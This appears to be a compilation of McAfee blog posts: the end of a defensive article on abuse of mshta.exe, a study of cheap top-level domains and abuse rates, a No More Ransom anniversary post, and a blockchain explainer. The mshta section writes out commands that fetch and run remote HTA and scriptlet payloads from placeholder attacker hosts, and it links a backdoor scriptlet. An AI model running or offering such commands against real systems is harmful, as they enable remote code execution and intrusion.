
How It Is Used:

The most interesting abuse of native Windows binaries is the ability to run a program that will either execute passed-in code or execute a payload hosted remotely. This was quite popular with Casey Smith’s Squiblydoo and Squiblytwo attacks, where regsvr32 and wmic (also considered LOLBINs) were both found to be signed Windows binaries able to execute code hosted remotely.

Example 1: A remote file being executed:

   mshta.exe http[:]//malicioussite.com/superlegit.hta

Example 2: Mshta used to execute inline JScript/Vbscript.

Note: this syntax only works in cmd; it will give an error if executed in PowerShell.

   mshta vbscript:(CreateObject("WS"+"C"+"rI"+"Pt.ShEll")).Run("powershell",1,True)(window.close)

Example 3: Calling a public method named Exec in a com scriptlet with JavaScript:

   mshta javascript:a=GetObject("script:http://c2[.]com/cmd.sct").Exec()

source : https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor.sct

Note: notice the similarities between the usage of mshta with the exec method and the corresponding use in regsvr32 in the above gist.

Alternatively, a file with a .hta extension can just as easily be double clicked on by the user where the code is set to autorun on open much like a macro enabled document.

Availability in Public Tools

There is no shortage of easily accessible repos to help someone quickly generate a payload to use mshta. .hta file type generation is available in nearly all public red-teaming tools such as Empire, Metasploit, Unicorn, and Koadic.

Do not forget, however, that mshta’s use is not limited to .hta files. It can also call code registered inside of com scriptlets (.sct) so it is relevant to other tools such as GreatSCT.

It’s also worth noting that even if you have powershell.exe blocked, tools like nps payload have .hta files that dynamically build a project and compile it with msbuild (another tool to be wary of) to create a tool that can execute PowerShell commands without using powershell.exe at all.

In The Wild:

One of my favorite tools to look for examples is app.any.run. It is an interactive online sandbox and is a great resource for finding new samples. You can even filter by MITRE ATT&CK Technique which is what I did here:

As you can see, there is no shortage of samples to go through. Another interesting detail is we can see several different file extensions used outside of the standard .hta and even some where the sandbox has found there are no threats detected. Is that true though?

Here we can see it has a dubious name of windows-update.hta running from a temp folder. This looks to be a binary embedded within an .hta file to trick automated sandbox detection.

Here we look at another sample with no threats detected.

sha256: 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

We see multiple file extensions used in the name to try and fool end users into thinking it is a picture. The script appears to be using WMI to spawn a new process which breaks the “expected” process chain of mshta > PowerShell and can allow malware to bypass rules that look for a direct process relationship such as Word > PowerShell.

We can also see the sandbox believes this is not malicious based on its scoring. Luckily, we can look at the PowerShell code that it spawns and get a better idea.

Process tree for 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

So, mshta can also be used to execute vbscript and WMI to break the process tree chain and launch PowerShell.

And in the below example you can see mshta’s role in continuing part of an infection chain in common malware.

Use of exploit then using mshta to execute remote code spawning the rest of the infection chain

Protection and Recommendations

One of the easiest things you can implement is to change the default application for files with an .hta extension from mshta.exe to a plain text editor such as Notepad, to help keep users from unwittingly double clicking a malicious .hta attachment.

If you are a McAfee customer, McAfee Endpoint Security (ENS) provides rules 322, which is now enabled by default, and 324 that can be enabled in ePO to help protect your environment against malicious mshta abuse.[2]

You should also spend some time exploring where abusable native binaries like mshta.exe are used in your environment. If there are no business needs that require it, blocking it outright is advised. If it is required, understand where and why so you can find the systems running things like mshta.exe that aren’t expected to be.

 

For more insights and tips like these subscribe to this blog or check out the latest threats from our Threat Center.

[1] For a more complete list of these see: https://lolbas-project.github.io/

[2] Located within the Advanced Threat Protection module of ENS

The post What Is Mshta, How Can It Be Used and How to Protect Against It appeared first on McAfee Blogs.

Examining the Link Between TLD Prices and Abuse

Briefing

Over the years, McAfee researchers have observed that certain new top-level domains (TLDs) are more likely to be abused by cyber criminals for malicious activities than others. Our investigations reveal a negative relationship between the likelihood of abuse and the registration price of some TLDs, as reported by the McAfee URL and email intelligence team. This means that new TLDs are more likely to be picked up by cyber criminals if their registration prices are low.

What is a Top-level Domain?

According to Wikipedia, a top-level domain (TLD) is one of the domains at the highest level in the hierarchical Domain Name System of the Internet. It is the last part of the domain name, e.g. the TLD for www.google.com would be ‘com’.

There are two major types of TLD: country code TLDs and generic TLDs. The first type uses country codes directly, e.g. co.uk for the United Kingdom, and domains under this type of TLD tend strongly to serve those countries. Generic TLDs typically serve more general content; they form the basis of this study, as they represent most of the domains we have observed recently.

TLD Registration Price

As a previous McAfee article noted, bad hackers hack to make financial gains[1]; there is no doubt that when cyber criminals plan malicious activities, they will choose the lowest-cost method to maximize their potential profits.

Below is a list of badly abused TLDs received from the McAfee URL and email intelligence team. Referencing domain.com, we found that the one-year registration prices for these abused TLDs are relatively low (under $20 for the first year) in comparison to other generic TLDs on the same list, which suggests that cost is a deciding factor. (We used the one-year registration price because domains created for malware attacks usually have a short, event-driven lifespan; they are normally taken down after the attack stops, so they are registered for only one year, the minimum registration period required by many domain registration platforms.)

To investigate whether there is a relationship between TLD registration price and abuse rate, we examined TLDs across different registration price ranges, from $1 to $270; the results can be seen in the diagram below. The ‘abuse rate’ in the diagram is the number of domains under a specific TLD that are marked as either Medium or High Risk by McAfee (and thus normally blocked at endpoints), divided by the total count of domains under the same TLD logged in McAfee’s URL database.
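As a concrete illustration, here is a minimal sketch of that calculation in Python. The record layout and sample values are assumptions for the example, not McAfee’s actual reputation schema.

```python
# Sketch: abuse rate per TLD = flagged (Medium/High Risk) domains / all logged domains.
from collections import defaultdict

domains = [  # hypothetical reputation records
    {"domain": "example1.xyz", "tld": "xyz", "risk": "High"},
    {"domain": "example2.xyz", "tld": "xyz", "risk": "Minimal"},
    {"domain": "example3.com", "tld": "com", "risk": "Medium"},
    {"domain": "example4.com", "tld": "com", "risk": "Minimal"},
]

def abuse_rate_by_tld(records):
    flagged = defaultdict(int)   # domains rated Medium or High Risk
    total = defaultdict(int)     # all domains logged for the TLD
    for rec in records:
        total[rec["tld"]] += 1
        if rec["risk"] in ("Medium", "High"):
            flagged[rec["tld"]] += 1
    return {tld: flagged[tld] / total[tld] for tld in total}

print(abuse_rate_by_tld(domains))  # e.g. {'xyz': 0.5, 'com': 0.5}
```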

We can see that, as TLD registration price goes down, especially when it dips below $20, the abuse rate soars. This suggests a correlation between price and abuse. Although the trend in the diagram is clear, there are several anomalies: to the left we have ‘.BEST’, while to the right ‘.HOST’, ‘.LINK’ and ‘.SALE’ are outliers.

‘.BEST’ may be an outlier for two reasons: first, we do not have many domains under this TLD, so the result may be skewed by insufficient samples; second, its lexical appeal makes it a good TLD for marketing domains, especially spam-driven ones, even though the registration price is on the higher side. For the other outliers the reasoning is less clear. Their lexical features may skew them closer to the legitimate side compared with the rest of the badly abused TLDs. Nonetheless, they still have abuse rates greater than 20%, so they remain badly abused compared with the TLDs on the left of the diagram.

Side research

While conducting the above study we also considered the percentage of domains under these badly abused TLDs that rank among the highest-trafficked websites, as reported by services such as Amazon Alexa. We carried out a study on the six TLDs below, which our email intelligence team reports as highly associated with spam activity.

The chart above shows that, for domains under these six sample TLDs, the average percentage appearing in the Alexa top 1 million websites is below 1%, which reinforces the finding that these TLDs do not typically serve much legitimate content. Organizations may want to evaluate these findings and, based on their risk appetite, apply further scrutiny to the domains in their inbound and outbound traffic. Such scrutiny of the originating source very rarely considers the price of registering a domain; while that analysis may not be warranted for many organizations, those with a low risk appetite may want to consider it.

Advice to our customers

Different McAfee customers have different security policies for their endpoints, which in turn support their overall risk appetite. With regard to the graph above, different approaches might be taken toward TLDs that are considered ‘too risky’; if enterprise customers would like to take such action, it can easily be achieved by adding a local rule in the McAfee Web Gateway Configuration Panel.

At the same time, organizations with a higher risk appetite may not need such an aggressive approach. Whatever the final action, however, it is always good to review your organization’s security policies from time to time and consider what kind of policies would suit your business best.

Meanwhile, to our Web Advisor customers: whenever you receive a URL that resolves to one of the risky TLDs mentioned above, and it has an Unverified / Medium / High Risk reputation and/or no category in McAfee’s database (which can be double-checked at https://trustedsource.org), please be wary of clicking it, as it may pose a greater security risk to you.

Reference:

[1]. https://securingtomorrow.mcafee.com/consumer/identity-protection/are-all-hackers-bad/


No More Ransom Blows Out Three Birthday Candles Today

Collaborative Initiative Celebrates Helping More Than 200,000 Victims and Preventing More Than 100 million USD From Falling into Criminal Hands

Three years ago, on this exact day, the public and private sectors drew a line in the sand against ransomware. At that time, ransomware was becoming one of the most prevalent cyber threats globally. We were hearing stories of patients being turned away from hospitals and the urgent medical attention they needed because someone clicked on a link in an email! Since that time, every sector has had a litany of examples where companies targeted by ransomware attacks were faced with the digital equivalent of Sophie’s Choice: pay criminals or potentially lose your business.

Three years ago, to this very day, the No More Ransom initiative gave victims a third option: get their files back for free. Of course, a silver bullet for all forms of ransomware does not exist, but, as the free decryptor the initiative made available for the GandCrab ransomware has shown, there is hope.

A Public Private Collaboration Where Success is Measured by Every Victim Saved

No More Ransom began because of an operational problem that could only be solved through collaboration. A Law Enforcement Agency had seized a server containing private keys that could help decrypt the files of thousands of victims of a particular ransomware family. This provided a great opportunity to help thousands of people—but there was a problem.

A Law Enforcement Agency is bound by a geographical jurisdiction; further, developing decryption software is not its core competency. Fortunately, both global reach and software development happened to be exactly what cybersecurity companies could bring to the table.

It is exciting to see how the initiative has expanded at an enormous rate. Back when we started, we would never have believed that in merely three years we would have helped over 200,000 victims and prevented more than 100 million US dollars from falling into criminal hands.

Even though cyber threats, including ransomware, are constantly evolving we remain confident that, together, we can continue to take a stand and disrupt this form of cybercrime. We are also delighted that so many public and private sector institutions have joined in this fight against the threat of ransomware. What began as a small group of individuals in a room in the Hague is now a global initiative, working together to fight back.

Remember #DontPay #NoMoreRansom


Demystifying Blockchain: Sifting Through Benefits, Examples and Choices

You have likely heard that blockchain will disrupt everything from banking to retail to identity management and more. You may have seen commercials for IBM touting the supply chain tracking benefits of blockchain.[i]  It appears nearly every industry is investing in, adopting, or implementing blockchain. Someone has probably told you that blockchain can completely transform your business! Is this hype or could blockchain really have such a dramatic impact? In this analysis, we will explore both real-world and contrived examples for implementing this quickly developing technology. We will also explain the two key benefits blockchain provides, as well as when to look elsewhere for the appropriate solution. We will explain the primary distinguishing features of major blockchains to help you choose which, if any, is best for you.

Who Uses Blockchain?

Cryptocurrencies may be the best-known example of blockchain use, but they are not the only ones. American Express launched a blockchain linked to its membership rewards program in May 2018.[ii] This program has a lot of similarities to traditional currency exchanges and points reward systems. However, integrating the points rewards system into a blockchain can provide additional data beyond the transactions. American Express uses it to provide insight into partner offerings, while partners receive similar insight into customer behavior. The data associated with that transaction is valuable to both the rewards program owner and the partners that facilitate the rewards. Product manufacturers can use a blockchain system in this manner to accept rewards purchases through their own channels, while the program owner can get more visibility on stock keeping data. Data sharing to all parties can be simplified, enriching the entire ecosystem.[iii]

Financial institutions are not the only ones investing in blockchain; the energy sector is also developing plans. LO3 Energy is working on changing the way energy is distributed, particularly in local areas.[iv] Using this technology, they can facilitate energy trading between consumers, reducing inefficiencies and reliance on nonlocal sources. Siemens announced additional investment into LO3 Energy in December 2017. Together they will work to establish microgrid communities and local energy marketplaces.[v] Blockchain does not just store records of energy transactions; it can also facilitate and enforce business rules, creating automated execution of transactions between users.

Even your future commute may be positively impacted by blockchain technology. The auto industry is investing in blockchain in a big way. On May 2, 2018, the Mobile Open Blockchain Initiative announced a consortium of car manufacturing–related partners to standardize blockchain use in the industry.[vi] That announcement listed several upcoming projects:

  • Vehicle identity, history, and data tracking
  • Supply chain tracking, transparency, and efficiency
  • Autonomous machine and vehicle payments
  • Secure mobility ecosystem commerce
  • Data markets for autonomous and human driving
  • Car sharing and ride hailing
  • Usage-based mobility pricing and payments for vehicles, insurance, energy, congestion, pollution, and infrastructure

Many of these projects are related to data management. This is an obvious application because blockchain is a data-centric structure. Ford was recently awarded a patent related to the partnership.[vii] In the patent the company proposed a system for vehicle-to-vehicle cooperation to marshal traffic.

Figure 1: Image of traffic congestion from Ford’s patent application. Source: Ford Global Technologies.

To decrease congestion, vehicles can communicate with one another to coordinate movement, improving traffic flow. The system also allows vehicles to collaborate based on priority. If a driver is in a hurry, surrounding vehicles can adjust traffic flow to that individual’s speed. One beneficial application could be for emergency responders.

Blockchain is still in its infancy but has already taken hold in certain industries. You do not need to be a programmer to understand its value. There are many use cases, some of which are not obvious until you understand exactly what blockchain is and which problems it solves. Applying blockchain to the right problem could have a significant impact on your success. Applying blockchain to the wrong problem may reduce your efficiency and waste time and resources.

What is Blockchain?

Rather than explain blockchain with technical jargon such as nonces, hash functions, merkle trees, and other complex concepts, let’s instead begin with a simple business analogy.

Four companies agree to a business opportunity to design, print, deliver, and sell 2020 New Year’s holiday cards. Each company is responsible for its own portion of the product. If the product is designed, printed, delivered, and sold by December 31, they stand to make a significant profit. However, if any one of the companies backs out or fails to deliver on its task, then the entire project fails—resulting in a significant loss.

Suppose, after agreeing to ship the cards, the delivery company receives a new, more lucrative offer. The profit from the opportunity offsets any loss from the holiday cards. Its priority changes accordingly. The three remaining companies now must deal with the consequences of one undependable member failing to fulfill its agreement. How can they come to an agreement when they depend on others yet cannot trust them to follow through?

This is the problem that blockchain solves. Rather than depending on a central authority such as a government for validation and enforcement, blockchain solves this problem in a decentralized way. It removes the need to trust the contributors or any authority. It is called a trustless network, meaning that no trust is needed because everything can be verified by any member. How does the concept of a trustless system work?

The agreement to contribute is called consensus. If even one member does not agree, whether for malicious purposes or through miscommunication, consensus is broken. It is the primary function of blockchain to guarantee consensus as well as immutability of the data. Consensus is gained through the consensus algorithm requiring a proof or voting threshold. We will discuss specific consensus algorithms and how they work later.

Blockchain can be thought of as a ledger of data, so ensuring the data cannot be tampered with (immutability) enables the verification of the ledger state. No one can go back and alter the books. Traditionally, the ledger is seen as a record of financial transactions. However, the concept applies to any type of data. One can just as easily store documents, images, log files, or other items in a blockchain. Even decentralized programs, also known as smart contracts, can be stored. Smart contracts enable the execution of code on the blockchain, but the code itself and its output are just a special type of data.

Figure 2: A simplified blockchain storing recipe instructions. The Previous Hash and Stuff fields generate the Hash field. This hash becomes part of the next record.

A blockchain has only two basic requirements:

  • A verifiable chain of blocks
  • A consensus model

Blocks simply store data. In our example, a block stores the agreements of the four companies. For cryptocurrencies this data is currency transactions. For a fresh-produce delivery company, the data might be sensor logs to verify proper handling and environmental controls. In certain unobvious implementations, even seemingly intangible objects such as the rules, assets, and user choices in a collectable card game can be stored as blocks.[viii]

Just because a block contains data does not make it trustworthy. Each block, more specifically its data, needs to be independently verified by all clients to ensure consensus. This concept requires data immutability. If a client cannot verify the block, then it must trust some authority, ultimately breaking the tenet of decentralization. Again, to avoid technical jargon, all we need to understand is that blocks can be uniquely identified by a hash. Think of a hash as a unique identification number that is not assigned, but rather calculated. Every client can calculate the same hash of the same block using the same algorithm. If any data changes, even a single character, the hash changes completely. By calculating and storing the hash, all parties can verify that the data has not changed. (In principle, there is a small chance, depending on the hashing function used, that more than one block could be identified with the same hash. However, the likelihood is so incredibly small that a brute-force attempt on current SHA-256 hashes would take longer than the age of the universe.)

We can verify an entire “chain” of blocks as well. Because the hash of any block is just data, it can be added to the data of the next block. By adding the hash of one block to the next, we can interlink the data of all blocks. The data of any block is dependent on all previous data in the chain. If anyone tampers with data in any previous block, the hash of that block changes, as does the hash of every subsequent block, continuing all the way up the chain. Without needing to independently verify the data of every block, we can calculate each hash and verify the integrity of all data.
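To make the chaining concrete, here is a minimal sketch in Python. It assumes SHA-256 and a simplified block layout of just a previous hash plus some data; real blockchains add nonces, timestamps, Merkle roots, and more.

```python
# Sketch: build and verify a simple hash chain; tampering with any block breaks it.
import hashlib

def block_hash(previous_hash: str, data: str) -> str:
    return hashlib.sha256((previous_hash + data).encode()).hexdigest()

def build_chain(items):
    chain, prev = [], "0" * 64  # genesis block has no real predecessor
    for data in items:
        h = block_hash(prev, data)
        chain.append({"previous_hash": prev, "data": data, "hash": h})
        prev = h
    return chain

def verify_chain(chain) -> bool:
    # Recompute every hash; any tampering breaks all later links.
    prev = "0" * 64
    for block in chain:
        if block["previous_hash"] != prev or block_hash(prev, block["data"]) != block["hash"]:
            return False
        prev = block["hash"]
    return True

chain = build_chain(["mix flour", "add water", "bake 20 minutes"])
print(verify_chain(chain))        # True
chain[0]["data"] = "add vinegar"  # tamper with an early block
print(verify_chain(chain))        # False
```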

However, knowing the data has not changed is not enough to ensure the original data is still intact. For example, a disgruntled employee may wish to create their own blockchain and remove items from the record. In a centralized system, we could restrict write access to trusted parties, such as a database administrator. In a decentralized system, in which multiple companies or individuals are involved, limitations make that level of control impractical. There are a few ways to come to a consensus, but there are two primary categories for decentralized blockchains:

  • Nakamoto-style consensus (lottery)
  • Byzantine fault tolerance (voting)

The first category is Nakamoto-style consensus, named after the author of the first blockchain paper.[ix] This method is akin to using a lottery system with some verifiable “cost” associated. Because cryptocurrency is the most common implementation of blockchain, the cost is historically based on the processing power required to mine cryptocurrency, but it could also be storage space or time, among other resources.

The second method of consensus is Byzantine fault tolerance, a model based on current networking fault-tolerance research. Just as a lottery is analogous to the Nakamoto model, voting is analogous to the Byzantine fault-tolerance model. Each model has its pros and cons, which are important to understand when choosing a consensus model. We will describe major consensus implementations later in this analysis.

Both Nakamoto-style and Byzantine fault tolerance consensuses have several implementations to choose from. Regardless of which implementation we choose, once consensus is reached these blocks can be chained together, creating a single ledger of immutable data. Multiple chains may exist, but only one chain is agreed upon. Additional chains can arise by happenstance or through malicious actors, but only one chain will be considered correct by the network.

The following image shows a failed attack against a proof-of-work consensus model from a simulator. The green nodes all agree to use the longest chain, based on the consensus model. Bad actors, illustrated as red nodes, are unable to break the consensus of other members due to the high processing cost in the proof-of-work model. Notice the green, or “honest,” nodes all agree on the latest block simply by choosing the longest chain with the most work.

Figure 3: A proof-of-work simulation showing consensus despite malicious actors.

Comparing Use Cases: the Good and the Bad

Data within blocks is similar to records in a database. Many scenarios can be handled with traditional databases, and in some cases they are better served by one. When is using a blockchain appropriate and when is it not? We can boil this question down to two principles:

  • Decentralization of owners
  • Lack of trust

Any system that requires centralization and tight control is not a good candidate for blockchain. In many cases we could make it work, but we would be better off looking elsewhere. A centralized system relies on some authority deciding what is valid. It can be streamlined to be incredibly efficient. By using a blockchain we must either give up that authority, losing efficiency, or maintain the authority, breaking key benefits of blockchain. There are also some gray areas where a balance must be met. Let’s take a look at good and bad use cases and compare them.

Decentralization: the good

Alice owns a hospital that serves thousands of patients a week. The medical staff need to have a clear picture of every patient’s medical history to make effective and safe decisions. When patients come in for the first time they are asked routine medical questions that are entered into their records. When the patients return, the records are retrieved and reviewed by the staff. However, patients sometimes have difficulty remembering key details or leave out important information. The hospital can request information from their previous providers. That may prove impractical in a time-sensitive scenario or when the patients are unable to assist. The patients might have one or more providers they have forgotten, leaving the staff ignorant of some medical history.

This is an example of the decentralization principle. Alice’s hospital has no control over any medical data not in its possession. That data is dependent on the accuracy of the patients and other medical practitioners. Alice also has no control over the other practitioners. She is dependent on their timely cooperation. Each entity needs to ensure the data is up to date and accurate while not being held accountable by the other. Who gets the final say on the entirety of the medical history? How does Alice know if she has it all? There are certainly centralized solutions to the problem, but the decentralized nature of the patients’ data flow lends itself well to a blockchain solution. Some solutions for this problem are already underway.[x]

Decentralization: the bad

Bob is the owner of a chain of restaurants in the Dallas area. To encourage customers to return, he has introduced a rewards system; customers can earn points by spending money at any of his restaurants. They can use the points to pay or reduce their next bill. As a bonus, he would like the points to be transferable to other patrons. Recognizing the similarities between his point system and cryptocurrencies, Bob implements a blockchain to track the distribution and transfer of the points. Members can join his blockchain network when they earn points. They can spend points by submitting the changes to the network. Bob does not even require names for the points. As long as the owners keep their account keys, they can freely transfer the points to anyone.

This scenario is deceptively similar to cryptocurrency implementations and the American Express rewards system. However, the similarities have confused Bob. His customers and individual restaurants are considered to be decentralized. However, Bob is the owner of all the restaurants and gets to make all business decisions for them. This is not a decentralization of owners but of management. In the American Express rewards program, each partner has its own agency. American Express does not control them or their actions. This is an example of a decentralization of owners. Furthermore, Bob’s customers are also not independent of Bob. If Bob decides to serve only pizza, then customers will have limits on what they can order. Bob is an authority in the entire system even if the pieces have varying degrees of autonomy. He can certainly allow managers to supply their own menu, but they are accountable to him. The system Bob envisions fails the decentralization principle.

Could Bob implement his point system anyway? Certainly. However, he fails to gain many of the advantages of using blockchain while losing the efficiency and agility of a traditional database implementation. Instead of blockchain, he could load points onto a rewards card that anyone could carry. The database can track the current balance of the card. Each restaurant can check the database before approving any purchases with points. This is a simple and effective system that has already been proven to be fairly robust. Bob’s case may not be a good candidate, but simple changes could change that. What if Bob did not own all the restaurants? What if the points could be used by partners such as hotel chains? These new features remove Bob as a central authority—making a much better case for a blockchain solution.

Trust: the good

Carol owns a grocery store and wants to buy only the freshest produce from her suppliers. However, sometimes she does not see the quality of the product until it is stocked, well after accepting delivery. Her suppliers maintain that the quality of the produce is good and any issues should have been raised at the time of delivery. They disagree who is at fault for the low-quality produce. It could be improper storage by the farmers, oversight of the goods by the shippers, or failure to check the goods by Carol’s grocery staff. To solve this issue, Carol and her suppliers created a blockchain network to track the handling of the produce. Storage sensors measure the moisture and heat of the storage unit as well as timestamps from the farm to final delivery. When the produce switches hands, a new record on the blockchain indicates the change and new storage sensor data collection begins.

Carol does not trust that produce is delivered in good condition. The suppliers do not trust that Carol stores the produce correctly. If each entity could validate proper storage, trust would not be required. Carol could decide, with limited inspections, whether to accept the produce based on its storage record. The farmers could prevent unreasonable returns based on faulty temperature control during shipping. This scenario fits the lack-of-trust principle among the participants. Additional measurements such as weight and images of the produce at various stages could also be added for further verification. If we suppose that the suppliers service many grocery stores and Carol buys from multiple suppliers, then we have an even stronger case for the decentralization principle as well.

Trust: the bad

Ted wants to create a sports card trading network. Users need to prove they legitimately own the cards. By registering the card in a blockchain, all users can track who owns which card and verify ownership if someone claims to own a rare or valuable card. Ted creates a blockchain to maintain the ownership data. When someone trades a card, the records are updated to reflect the change.

At first glance, this scenario is similar to Carol’s produce problem. A physical item must be delivered, and details are stored in the blockchain. However, Carol has the option to verify log data before she accepts the delivery. If there is a disagreement, the log data can establish who is at fault, and that party assumes the cost. Ted, however, wants to track the physical object. Any disagreement will be about the delivery and location, not the quality of delivery and storage. If Ted delivers a card, the network trusts that he will update the records accordingly. If the network is updated, both the buyer and seller trust that the card was delivered. Data within this trading system cannot be independently verified. If there is a disagreement, there is no recourse within the network. The physical location of the card is important, as is the timing of both the physical and blockchain transactions. In Carol’s system, what matters is only the log data and whether that data as a whole can be verified. She answers the question, “Did you deliver the produce to spec?” Only then does a transaction happen. Carol’s recourse is not to accept the delivery. In Ted’s scenario, the card may be registered in the wrong hands—with no ability to correct the network.

Could a similar system work for Ted? Absolutely. One solution is to step into some gray area and add a little trust to the system. However, any required trust creates dependencies, so our goal is to reduce reliance on a trust model as much as possible. If Ted worked with digital trading cards instead of physical cards, he could reduce the trust factor to zero. The entire system could be contained in the network, eliminating any need for trust. If he must maintain physical cards, then he could learn from examples in the diamond industry. Beginning early in 2018, the diamond industry implemented blockchain to track 100 diamonds from mine to retail with a limited amount of trust.[xi] Each entity was required to upload data at each milestone, creating a method of verification. Trust in this case was reduced, but not eliminated, and allowed multiple stakeholders visibility into the diamonds in their possession. Ted could take a similar route to require a proof-of-delivery stage for a valid trade transaction. The harder the proof of delivery is to fake, the less trust the system needs. Any data coming from outside the network requires some form of trust. Ted can balance his needs for physical tracking against added trust in outside delivery verifications.

Holiday cards

How does the holiday card example fare with the decentralization and trust principles? It should be clear that the four companies have their own agency. They do not answer to the same management or boards of directors. The lack of centralization indicates blockchain could provide value that a traditional database could not. The trust principle is a bit more difficult to pin down, however. Certainly, they lack trust that each will do the job they were contracted to do. However, there are additional trust issues they may be concerned with. Can each party actually perform their obligations? Who is tracking the profits? If one party fails its part of the contract, how do the others recover? Each of these issues could be addressed using a blockchain implementation. To cover them all would be a massive undertaking, particularly in these early stages of the technology. Asset tracking could be resolved much like the diamond-tracking system we discussed. Financials could be tracked similarly to popular cryptocurrency implementations. Contract breach penalties could be built into the business logic using smart contracts—assuming the legal hurdles can be surmounted. What remains is the ability to gauge whether the obligations can be met in the first place. Each company could load relevant resources into a blockchain to be checked by another. This, unfortunately, requires a lot of trust that the data is entered correctly. Further work could be done to reduce this trust gap but those systems need to be designed and proven to be viable in major transactions.

Blockchain Options

You have determined you have a good case for blockchain. Now what? Do you build your own? Do you piggyback off current infrastructure such as Bitcoin scripts or Ethereum contracts? Create your own tokens? There are pros and cons to each. Fortunately, demand has created markets that can simplify your implementation. Which type of blockchain do you need?

Public, private, permissioned

There are three primary types of blockchain: public, private, and permissioned. A public blockchain is the best known. Bitcoin, Ethereum, and most other cryptocurrencies fall into this category. They are generally open to the public without restrictions. Private blockchains are not open to the public. The contributors to the network are well defined, with no outside entities allowed. Organizations may build a private blockchain in house or with a select group to solve a business need. Permissioned blockchains are provided to the public with a set of rules. Nodes are clearly identified, reducing anonymity. Access is provided only by invitation or request. Permissioned blockchains may have additional rules on the allowed behaviors of individuals or groups of nodes.

Public

Public blockchains are good for set-and-forget solutions, particularly if you are not much concerned with who participates in the network. You could build your own or quite easily fork a current blockchain. Technologies such as Ethereum smart contracts have a lot of support and even developing standards for enterprise-ready development. A major drawback to public blockchain is the lack of control of the network behavior and uploaded data. There are ways to partially resolve these concerns, but they can become complicated and limit the options of which technologies you can use. The most common public blockchain technologies are Bitcoin, with limited script support extension, and Ethereum, with more flexible smart contract support.

Pros

  • Improved security due to network participation, particularly on Nakamoto-style consensus models
  • The network is likely to remain active regardless of personal contribution
  • Lots of current implementations that can be used or learned from

Cons

  • The network is likely to remain active regardless of personal contribution
  • Lack of control over the network’s future
  • Internal behaviors and data are visible and difficult to hide

 Private

If you are developing a private blockchain, you may be better served using a database solution. Why? Private blockchains lose most of the security benefits of blockchain while assuming the complexities and speed reduction. They do gain more privacy with internal activity, but those benefits can also be gained in a permissioned blockchain and certainly with control of your own database. One notable exception to this advice is internal testing and prototyping. If you are prototyping, testing, experimenting, or otherwise learning about blockchain technologies, private blockchains can be your personal sandbox. For example, you could compile your own Ethereum network with a hardcoded difficulty rating to privately test new contracts you are developing. You may even wish to create a private blockchain for staging and plan to open it to others in the future. From this perspective, some may choose to accept a security reduction in the short term to ensure long-term reliability.

From a security perspective, it is false to assume that only trusted parties can contribute to a private blockchain. Through use of phishing, botnets, and cloud services, malicious attackers could gain entry to your private blockchain and perform attacks such as Sybil and 51% attacks.[xii] Due to the inherent lack of scale in private networks, these attacks may not only be possible, but also relatively cheap. This type of targeted attack on a private blockchain has not been publicly observed; however, similar attacks have been performed against smaller public blockchains.[xiii] If you choose the private blockchain route there are simple ways to achieve this without reinventing the wheel. One way is to clone any number of blockchain solutions such as Ethereum and configure the clients to connect to a custom network. You may wish to implement additional protection to authenticate valid users while relying on the readily available core technology.

Pros

  • Improved control over the network’s future
  • Internal activity and data can be designated to trusted participants
  • Required features can be tailored to business needs

Cons

  • Severely reduced security due to lack of adoption
  • Slower than any similar database solution
  • Code and network maintenance

Permissioned

Permissioned blockchains strike a balance between public and private blockchains. The best known permissioned blockchain is Hyperledger Fabric, a blockchain framework implementation.[xiv] Hyperledger Fabric enables organizations to maintain some control over their segment of the blockchain while gaining many benefits of broader adoption. Each segment can control its own consensus model to govern its data, in this case through channels.[xv] This framework is seen as one of the most mature implementations of blockchain with enterprise-ready business solutions.[xvi] Other solutions include Hyperledger Sawtooth, Quorum, and Stellar, which are used by various companies.[xvii] [xviii] Forbes lists 50 top public companies investing in blockchain.[xix]

Pros

  • Improved control over the network’s future
  • Participants can be vetted based on the network’s needs
  • Provides most of the benefits of public blockchains with trade-offs in increased trust

Cons

  • Requires some trust in a central authority or consortium
  • Potentially reduced security based on adoption
  • Requires commitment to keep your network segment active

Proof of work

Any agreement requires a consensus on the facts. Blockchain maintains what amounts to record entries that all participants agree on. The method on which participants agree to these records is called the consensus algorithm. Most consensus algorithms expend a finite resource to prove that work was required to write to the ledger. For every additional block in the blockchain, increasing resources are spent. This measurement is additive because each block must be computed separately. By knowing the difficulty of the work being done on each block, participants can calculate how much work was done on an entire chain. The longest chain is always considered the active chain. Thus, in a short time, participants will gain a consensus in which the records that make up the longest chain are agreed upon.

Proof-of-work is the most common consensus model. It was the first proof proposed in Satoshi Nakamoto’s paper “Bitcoin: A Peer-to-Peer Electronic Cash System.”[xx] The primary resource used in a proof-of-work algorithm is processing power, initially provided by the CPU. The most common implementation is based on the SHA-256 hashing algorithm. Each block is hashed using SHA-256, with the goal that the resulting hash is smaller than a target number. This number is chosen based on the speed with which the network mines blocks. If a block has a hash that is lower than or equal to the target number, then it is valid and can be appended to a chain. Lower targets create higher difficulty ratings on each block. These ratings are used to determine which chain used the most resources and is, therefore, the active one. In the proof-of-work example below, the difficulty requires a hash that begins with five zeros; any hash with fewer than five leading zeros is larger than the target and is invalid. The block’s “header hash” is used for this comparison. In lay terms, proof-of-work creates a mathematical problem and turns it into a lottery-like system: the winner is whoever solves the problem first. It has the added benefits of controlling the speed of writing to the blockchain and enabling users to agree on the same chain.

Figure 4: Hashing results from a proof-of-work simulator. A valid header hash starts with five zeros.
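Here is a minimal proof-of-work sketch in Python that matches the five-leading-zeros example above. Counting leading zeros is a simplification; real implementations compare the full 256-bit hash against a numeric target.

```python
# Sketch: brute-force a nonce until the block's header hash meets the difficulty target.
import hashlib
from itertools import count

def mine(previous_hash: str, data: str, difficulty: int = 5):
    target = "0" * difficulty
    for nonce in count():                       # try nonces until one wins the "lottery"
        header = f"{previous_hash}{data}{nonce}".encode()
        header_hash = hashlib.sha256(header).hexdigest()
        if header_hash.startswith(target):      # hash is at or below the target
            return nonce, header_hash

# Difficulty 5 needs roughly a million attempts on average; higher values take far longer.
nonce, header_hash = mine("0" * 64, "recipe: bake 20 minutes")
print(nonce, header_hash)                       # header hash begins with 00000...
```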

